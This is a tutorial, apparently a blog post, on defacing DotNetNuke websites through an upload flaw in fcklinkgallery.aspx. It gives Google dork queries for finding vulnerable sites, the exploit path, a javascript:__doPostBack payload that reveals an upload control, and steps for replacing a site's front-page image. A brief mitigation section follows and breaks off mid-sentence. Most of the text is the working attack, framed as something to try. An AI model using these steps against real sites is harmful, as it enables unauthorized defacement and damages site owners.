As Hmei7 posted on twitter, he might be using an old DNN [Dot Net Nuke] Exploit. But how difficult is this exploit? To be honest, it is as easy as hell. Only script kiddies would still use them.
First Check whether the website is vulnerable or not.
To find such websites simply copy this code to Google and hit enter:
inurl:/portals/0
or
inurl:/tabid/36/language/en-US/Default.aspx
or
inurl:/tabid/36/language/en-US/Default.aspx
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.example.com the image is located at location:
http://www.example.com/Portals/0/SHM.jpg
Yeah... it means this website is vulnerable and we can change the front page pic.
Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
Now here is the exploit :
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
How to deface ?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File.
Now select you image file which you have renamed as SHM.jpg & upload here.
Go to main page and refresh... That's it, you have defaced the website.
How to mitigate ?
Because there is no known fix, there are only ways to mitigate this attack (and hence it is a zero-day hack).
1. Rename the fcklinkgallery.aspx fileAs fcklinkgallery.aspx is the entry point for this hack attack, the first thing to do is to rename this file. I suggest using a random file name – like a guid. After you rename the file, you will need to update the “LinksGalleryPath” setting in your config file. This will be found in the